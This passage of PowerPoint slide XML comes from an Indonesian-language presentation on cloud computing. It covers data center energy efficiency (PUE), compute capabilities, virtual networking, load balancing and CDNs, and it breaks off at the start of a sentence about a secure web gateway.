              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengupayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PUE yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PUE yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastisitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyatuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CDN.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3792597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D" dirty="0"/>
              <a:t>Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
